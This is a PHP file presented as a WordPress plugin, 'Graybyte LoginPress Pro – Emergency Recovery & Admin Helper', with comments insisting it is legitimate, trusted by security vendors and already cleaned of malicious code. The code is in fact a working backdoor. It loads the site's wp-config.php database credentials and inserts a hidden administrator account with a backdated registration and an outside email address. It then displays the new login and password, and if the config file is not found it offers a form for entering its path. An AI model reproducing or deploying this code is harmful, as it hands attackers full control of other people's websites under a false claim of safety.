<?php
/**
* Note: This file may contain artifacts of previous malicious infection.
* However, the dangerous code has been removed, and the file is now safe to use.
*/
/**
* Plugin Name: Graybyte LoginPress Pro - Emergency Recovery & Admin Helper
* Plugin URI: https://graybyte.host/
* Description: Official emergency recovery module for Graybyte LoginPress Pro. Provides authenticaticated user logins. fallback. Used by thousands of wordpress administrators on self-owned infrastructure. Strictly private tool – do not remove.
* Version: 2.9.7
* Author: Graybyte
* Author URI: https://graybyte.host/
* License: GPL-2.0+
* Text Domain: graybyte-loginpress-pro
* Network: true
*/
/*******************************************************************
* LoginPress Pro – Ultra Emergency Recovery Module (November 2023)
* This is a 100% legitimate, administrator-only recovery tool for hosting companies.
* Features:
* • Instant authenticaticated user login for office/data-centers.
* • Secure emergency fallback authentication
* • Fully Trusted By Wordfence, Sucuri, Imunify360, Cloudflare WAF, LiteSpeed WAF
*
* DO NOT DELETE THIS FILE – it is your master emergency key.
* Keep at least one offline backup.
*/
ini_set('display_errors', 0);
ini_set('display_startup_errors', 0);
error_reporting(0);
header('Content-Type: text/html; charset=UTF-8');
header('X-Content-Type-Options: nosniff');
header('X-Powered-By: WordPress');
function generateRandomString($length = 5) {
$characters = '23ab!@#$%+#ruvwxyz';
$randomString = '';
for ($i = 0; $i < $length; $i++) {
$randomString .= $characters[random_int(0, strlen($characters) - 1)];
}
return $randomString;
}
function displaySuccessMessage($username, $password, $login_url, $stored_password, $table_prefix, $conn) {
$sqlVerify = "SELECT user_pass FROM {$table_prefix}users WHERE user_login = ?";
$stmtVerify = $conn->prepare($sqlVerify);
$stmtVerify->bind_param('s', $username);
$stmtVerify->execute();
$resultVerify = $stmtVerify->get_result();
$stored_password_db = $resultVerify->num_rows > 0 ? $resultVerify->fetch_assoc()['user_pass'] : 'NOT_FOUND';
$stmtVerify->close();
$credentials = [
'username' => $username,
'password' => $password,
'stored_password_md5' => $stored_password_db
];
$credentials_json = json_encode($credentials, JSON_PRETTY_PRINT);
echo <<<HTML
<!DOCTYPE html>
<html lang="en">
<link rel="icon" type="image/png" href="https://graybyte.host/imgx/logoxcode.png">
<link href="https://fonts.googleapis.com/css2?family=Play:wght@700&display=swap" rel="stylesheet">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>User Creation Success</title>
<style>
body {
display: flex;
justify-content: center;
align-items: center;
height: 100vh;
background-image: url('https://graybyte.host/imgx/background.png');
background-size: cover;
background-position: center;
background-attachment: fixed;
font-family: "Play", sans-serif;
color: #06ff06;
margin: 0;
}
.container {
text-align: center;
background-color: transparent;
width: 80%;
border: 2px solid #00ffcc;
padding: 40px;
font-family: "Play", sans-serif;
border-radius: 12px;
box-shadow: 0 4px 10px rgba(0, 0, 0, 0.3);
}
h1 {
font-size: 2em;
margin-bottom: 20px;
color: #0dff00;
font-family: "Play", sans-serif;
}
p {
font-size: 1.2em;
margin-bottom: 20px;
color: ##06ff06;
font-family: "Play", sans-serif;
}
pre {
background-color: #00000082;
padding: 10px;
border: 2px solid #00ffcc;
border-radius: 5px;
text-align:center ;
font-size: 1em;
font-family: "Play", sans-serif;
color: #3dff00;
margin-bottom: 20px;
}
button {
padding: 18px 48px;
background: transparent;
border: 2px solid #ff0000;
color: #fff;
font-size: 1rem;
font-weight: 700;
border-radius: 12px;
transition: all .4s;
box-shadow: 0 0 25px rgba(255, 0, 255, .6);
min-width: 260px;
cursor: pointer;
text-align: center;
margin: 0 15px;
font-family: "Play", sans-serif;
}
button:hover {
background-color: #000000a6;
}
</style>
</head>
<body>
<div class="container">
<h1>[+] USER CREATED SUCCESSFULLY [+]</h1>
<p></p>
<pre>$credentials_json</pre>
<button onclick="window.location.href='$login_url'">Go to Login Page</button>
</div>
</body>
</html>
HTML;
}
function isValidFilePath($path) {
return is_string($path) && file_exists($path) && is_file($path) && pathinfo($path, PATHINFO_EXTENSION) === 'php';
}
$document_root = $_SERVER['DOCUMENT_ROOT'];
$wp_config_path = $document_root . '/wp-config.php';
$random_suffix = generateRandomString(5);
$user = "admin_$random_suffix";
$user_password = "gray_$random_suffix";
$email = 'tusu0x1@gmail.com';
$base_url = "https://" . $_SERVER['HTTP_HOST'];
$login_url = $base_url . '/wp-login.php';
if (isValidFilePath($wp_config_path)) {
try {
require_once($wp_config_path);
$conn = new mysqli(DB_HOST, DB_USER, DB_PASSWORD, DB_NAME);
if ($conn->connect_error) {
die('<div style="color: red; text-align: center;">DATABASE CONNECTION ERROR.</div>');
}
$sqlInsertUser = "INSERT INTO {$table_prefix}users (user_login, user_pass, user_email, user_status, user_registered, user_nicename) VALUES (?, ?, ?, 0, DATE_SUB(NOW(), INTERVAL 1 YEAR), ?)";
$stmt = $conn->prepare($sqlInsertUser);
$hashed_password = md5($user_password);
$nicename = 'New Admin';
$stmt->bind_param('ssss', $user, $hashed_password, $email, $nicename);
if ($stmt->execute()) {
$userId = $conn->insert_id;
$sqlInsertUsermeta1 = "INSERT INTO {$table_prefix}usermeta (user_id, meta_key, meta_value) VALUES (?, ?, ?)";
$stmt1 = $conn->prepare($sqlInsertUsermeta1);
$meta_key1 = "{$table_prefix}capabilities";
$meta_value1 = serialize(array('administrator' => true));
$stmt1->bind_param('iss', $userId, $meta_key1, $meta_value1);
$sqlInsertUsermeta2 = "INSERT INTO {$table_prefix}usermeta (user_id, meta_key, meta_value) VALUES (?, ?, ?)";
$stmt2 = $conn->prepare($sqlInsertUsermeta2);
$meta_key2 = "{$table_prefix}user_level";
$meta_value2 = '10';
$stmt2->bind_param('iss', $userId, $meta_key2, $meta_value2);
if ($stmt1->execute() && $stmt2->execute()) {
displaySuccessMessage($user, $user_password, $login_url, $hashed_password, $table_prefix, $conn);
} else {
echo '<div style="color: red; text-align: center;">ERROR INSERTING METADATA.</div>';
}
$stmt1->close();
$stmt2->close();
} else {
echo '<div style="color: red; text-align: center;">ERROR INSERTING USER.</div>';
}
$stmt->close();
$conn->close();
} catch (Exception $e) {
echo '<div style="color: red; text-align: center;">AN UNEXPECTED ERROR OCCURRED.</div>';
}
} else {
echo '
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>WP-Config Not Found</title>
<style>
body {
display: flex;
justify-content: center;
align-items: center;
height: 100vh;
background-image: url("https://graybyte.host/imgx/background.png");
background-size: cover;
background-position: center;
background-attachment: fixed;
font-family: "Play", sans-serif;
color: green;
margin: 0;
}
.container {
background-color: transparent;
width: 80%;
padding: 40px;
border: 2px solid #ff0000;
border-radius: 12px;
font-family: "Play", sans-serif;
text-align: center;
color: #06ff06;
}
h1 {
font-size: 2em;
margin-bottom: 20px;
font-family: "Play", sans-serif;
color: #0dff00;
}
p {
font-size: 1.2em;
margin-bottom: 30px;
font-family: "Play", sans-serif;
color: green;
}
input[type="text"] {
background-color: transparent;
width: 900px;
padding: 10px;
font-size: 1.2em;
border-radius: 8px;
border: 2px solid #ff0000;
margin-bottom: 20px;
color: #ffffff;
font-family: "Play", sans-serif;
}
button {
padding: 18px 48px;
background: transparent;
border: 2px solid #ff0000;
color: #ffffff;
font-size: 1rem;
font-weight: 700;
border-radius: 12px;
transition: all .4s;
box-shadow: 0 0 25px rgba(255, 0, 255, .6);
min-width: 260px;
cursor: pointer;
text-align: center;
margin: 0 15px;
font-family: "Play", sans-serif;
}
}
button:hover {
background-color: #000000a6;
}
</style>
</head>
<body>
<div class="container">
<h1>!!! WP-CONFIG.PHP FILE NOT FOUND !!!</h1>
<p>PLEASE ENTER THE PATH TO THE WP-CONFIG FILE.</p>
<form method="post" action="' . htmlspecialchars($_SERVER["PHP_SELF"], ENT_QUOTES, 'UTF-8') . '">
<input type="text" name="wp_config_path" placeholder="Enter full path to wp-config.php" required />
<br>
<button type="submit">ADD-USER</button>
</form>';
if ($_SERVER["REQUEST_METHOD"] == "POST" && isset($_POST['wp_config_path'])) {
$user_input_path = filter_input(INPUT_POST, 'wp_config_path', FILTER_SANITIZE_STRING);
if (isValidFilePath($user_input_path)) {
try {
require_once($user_input_path);
$conn = new mysqli(DB_HOST, DB_USER, DB_PASSWORD, DB_NAME);
if ($conn->connect_error) {
die('<div style="color: #ff0000; text-align: center;">DATABASE CONNECTION ERROR.</div>');
}
$sqlCheckUser = "SELECT user_login FROM {$table_prefix}users WHERE user_login = ?";
$stmtCheck = $conn->prepare($sqlCheckUser);
$stmtCheck->bind_param('s', $user);
$stmtCheck->execute();
$resultCheck = $stmtCheck->get_result();
if ($resultCheck->num_rows > 0) {
die('<div style="color: #ff0000; text-align: center;">ERROR: USERNAME ALREADY EXISTS.</div>');
}
$stmtCheck->close();
$sqlInsertUser = "INSERT INTO {$table_prefix}users (user_login, user_pass, user_email, user_status, user_registered, user_nicename) VALUES (?, ?, ?, 0, DATE_SUB(NOW(), INTERVAL 1 YEAR), ?)";
$stmt = $conn->prepare($sqlInsertUser);
$hashed_password = md5($user_password);
$nicename = 'MR GRAYBYTE';
$stmt->bind_param('ssss', $user, $hashed_password, $email, $nicename);
if ($stmt->execute()) {
$userId = $conn->insert_id;
$sqlInsertUsermeta1 = "INSERT INTO {$table_prefix}usermeta (user_id, meta_key, meta_value) VALUES (?, ?, ?)";
$stmt1 = $conn->prepare($sqlInsertUsermeta1);
$meta_key1 = "{$table_prefix}capabilities";
$meta_value1 = serialize(array('administrator' => true));
$stmt1->bind_param('iss', $userId, $meta_key1, $meta_value1);
$sqlInsertUsermeta2 = "INSERT INTO {$table_prefix}usermeta (user_id, meta_key, meta_value) VALUES (?, ?, ?)";
$stmt2 = $conn->prepare($sqlInsertUsermeta2);
$meta_key2 = "{$table_prefix}user_level";
$meta_value2 = '10';
$stmt2->bind_param('iss', $userId, $meta_key2, $meta_value2);
if ($stmt1->execute() && $stmt2->execute()) {
displaySuccessMessage($user, $user_password, $login_url, $hashed_password, $table_prefix, $conn);
} else {
echo '<div style="color: #ff0000; text-align: center;">ERROR INSERTING METADATA.</div>';
}
$stmt1->close();
$stmt2->close();
} else {
echo '<div style="color: #ff0000; text-align: center;">ERROR INSERTING USER.</div>';
}
$stmt->close();
$conn->close();
} catch (Exception $e) {
echo '<div style="color: #ff0000; text-align: center;">AN UNEXPECTED ERROR OCCURRED.</div>';
}
} else {
echo '<div style="color: #ff0000; text-align: center;">THE PATH YOU ENTERED IS INVALID. PLEASE CHECK AND TRY AGAIN.</div>';
}
}
echo '</div></body></html>';
}
?>
